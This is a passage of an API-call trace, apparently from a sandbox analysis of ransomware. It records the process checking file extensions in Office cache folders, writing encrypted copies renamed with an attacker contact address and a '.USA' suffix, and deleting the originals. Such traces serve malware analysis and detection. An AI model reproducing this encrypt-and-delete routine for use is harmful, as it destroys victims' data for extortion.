[0034.402] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.402] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.402] lstrlenW (lpString=".jpg") returned 4 [0034.402] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.402] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.402] lstrlenW (lpString="Proofing.xml") returned 12 [0034.402] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.402] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=811) returned 1 [0034.402] CloseHandle (hObject=0x160) returned 1 [0034.402] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020 [0034.403] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.403] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.403] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.403] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.403] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.403] GetLastError () returned 0x0 [0034.403] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x32b, lpOverlapped=0x0) returned 1 [0034.405] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x330, lpOverlapped=0x0) returned 1 [0034.406] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0034.406] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.406] SetEndOfFile (hFile=0x16c) returned 1 [0034.406] CloseHandle (hObject=0x16c) returned 1 [0034.407] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.407] SetEndOfFile (hFile=0x160) returned 1 [0034.407] CloseHandle (hObject=0x160) returned 1 [0034.408] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.408] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0034.408] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.408] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.408] lstrlenW (lpString=".doc") returned 4 [0034.408] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.408] lstrlenW (lpString=".docx") returned 5 [0034.408] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.408] lstrlenW (lpString=".pdf") returned 4 [0034.408] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.408] lstrlenW (lpString=".xls") returned 4 [0034.408] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.408] lstrlenW (lpString=".xlsx") returned 5 [0034.408] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.408] lstrlenW (lpString=".ppt") returned 4 [0034.408] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.408] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.408] lstrlenW (lpString=".zip") returned 4 [0034.408] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.408] lstrlenW (lpString=".rar") returned 4 [0034.409] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString=".bz2") returned 4 [0034.409] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString=".7z") returned 3 [0034.409] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.409] lstrlenW (lpString=".dbf") returned 4 [0034.409] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.409] lstrlenW (lpString=".1cd") returned 4 [0034.409] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.409] lstrlenW (lpString=".jpg") returned 4 [0034.409] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.409] lstrlenW (lpString=".doc") returned 4 [0034.409] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString=".docx") returned 5 [0034.409] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.409] lstrlenW (lpString=".pdf") returned 4 [0034.409] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString=".xls") returned 4 [0034.409] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString=".xlsx") returned 5 [0034.409] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.409] lstrlenW (lpString=".ppt") returned 4 [0034.409] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.409] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.409] lstrlenW (lpString=".zip") returned 4 [0034.409] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.410] lstrlenW (lpString=".rar") returned 4 [0034.410] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.410] lstrlenW (lpString=".bz2") returned 4 [0034.410] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.410] lstrlenW (lpString=".7z") returned 3 [0034.410] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.410] lstrlenW (lpString=".dbf") returned 4 [0034.410] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.410] lstrlenW (lpString=".1cd") returned 4 [0034.410] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.410] lstrlenW (lpString=".jpg") returned 4 [0034.410] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.410] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.410] lstrlenW (lpString="Setup.xml") returned 9 [0034.410] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.410] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=5884) returned 1 [0034.410] CloseHandle (hObject=0x160) returned 1 [0034.411] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.411] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.411] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.411] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.411] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.411] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.411] GetLastError () returned 0x0 [0034.411] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x16fc, lpOverlapped=0x0) returned 1 [0034.413] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1700, lpOverlapped=0x0) returned 1 [0034.414] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0034.414] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.414] SetEndOfFile (hFile=0x16c) returned 1 [0034.415] CloseHandle (hObject=0x16c) returned 1 [0034.415] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.415] SetEndOfFile (hFile=0x160) returned 1 [0034.416] CloseHandle (hObject=0x160) returned 1 [0034.416] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.417] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.417] lstrlenW (lpString=".doc") returned 4 [0034.417] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.417] lstrlenW (lpString=".docx") returned 5 [0034.417] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.417] lstrlenW (lpString=".pdf") returned 4 [0034.417] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.417] lstrlenW (lpString=".xls") returned 4 [0034.417] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.417] lstrlenW (lpString=".xlsx") returned 5 [0034.417] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.417] lstrlenW (lpString=".ppt") returned 4 [0034.417] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.417] lstrlenW (lpString=".zip") returned 4 [0034.417] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.417] lstrlenW (lpString=".rar") returned 4 [0034.417] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.417] lstrlenW (lpString=".bz2") returned 4 [0034.417] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.417] lstrlenW (lpString=".7z") returned 3 [0034.417] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.418] lstrlenW (lpString=".dbf") returned 4 [0034.418] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.418] lstrlenW (lpString=".1cd") returned 4 [0034.418] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.418] lstrlenW (lpString=".jpg") returned 4 [0034.418] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.418] lstrlenW (lpString=".doc") returned 4 [0034.418] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString=".docx") returned 5 [0034.418] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.418] lstrlenW (lpString=".pdf") returned 4 [0034.418] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString=".xls") returned 4 [0034.418] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString=".xlsx") returned 5 [0034.418] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.418] lstrlenW (lpString=".ppt") returned 4 [0034.418] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.418] lstrlenW (lpString=".zip") returned 4 [0034.418] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.418] lstrlenW (lpString=".rar") returned 4 [0034.418] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString=".bz2") returned 4 [0034.418] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.418] lstrlenW (lpString=".7z") returned 3 [0034.419] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.419] lstrlenW (lpString=".dbf") returned 4 [0034.419] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.419] lstrlenW (lpString=".1cd") returned 4 [0034.419] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.419] lstrlenW (lpString=".jpg") returned 4 [0034.419] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.419] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.419] lstrlenW (lpString="Office32MUI.xml") returned 15 [0034.419] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.420] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1383) returned 1 [0034.420] CloseHandle (hObject=0x160) returned 1 [0034.420] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020 [0034.420] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.420] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.420] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.420] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.420] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.421] GetLastError () returned 0x0 [0034.421] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x567, lpOverlapped=0x0) returned 1 [0034.534] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x570, lpOverlapped=0x0) returned 1 [0034.535] ReadFile (in: hFile=0x160, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0034.535] WriteFile (in: hFile=0x16c, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xf2, lpOverlapped=0x0) returned 1 [0034.535] SetEndOfFile (hFile=0x16c) returned 1 [0034.535] CloseHandle (hObject=0x16c) returned 1 [0034.536] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.536] SetEndOfFile (hFile=0x160) returned 1 [0034.536] CloseHandle (hObject=0x160) returned 1 [0034.537] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.537] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0034.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.537] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.537] lstrlenW (lpString=".doc") returned 4 [0034.537] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.537] lstrlenW (lpString=".docx") returned 5 [0034.537] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.537] lstrlenW (lpString=".pdf") returned 4 [0034.537] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.537] lstrlenW (lpString=".xls") returned 4 [0034.537] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString=".xlsx") returned 5 [0034.538] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.538] lstrlenW (lpString=".ppt") returned 4 [0034.538] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.538] lstrlenW (lpString=".zip") returned 4 [0034.538] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.538] lstrlenW (lpString=".rar") returned 4 [0034.538] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString=".bz2") returned 4 [0034.538] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString=".7z") returned 3 [0034.538] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.538] lstrlenW (lpString=".dbf") returned 4 [0034.538] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.538] lstrlenW (lpString=".1cd") returned 4 [0034.538] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.538] lstrlenW (lpString=".jpg") returned 4 [0034.538] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.538] lstrlenW (lpString=".doc") returned 4 [0034.538] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString=".docx") returned 5 [0034.538] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.538] lstrlenW (lpString=".pdf") returned 4 [0034.538] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.538] lstrlenW (lpString=".xls") returned 4 [0034.539] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.539] lstrlenW (lpString=".xlsx") returned 5 [0034.539] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.539] lstrlenW (lpString=".ppt") returned 4 [0034.539] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.539] lstrlenW (lpString=".zip") returned 4 [0034.539] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.539] lstrlenW (lpString=".rar") returned 4 [0034.539] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.539] lstrlenW (lpString=".bz2") returned 4 [0034.539] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.539] lstrlenW (lpString=".7z") returned 3 [0034.539] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.539] lstrlenW (lpString=".dbf") returned 4 [0034.539] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") 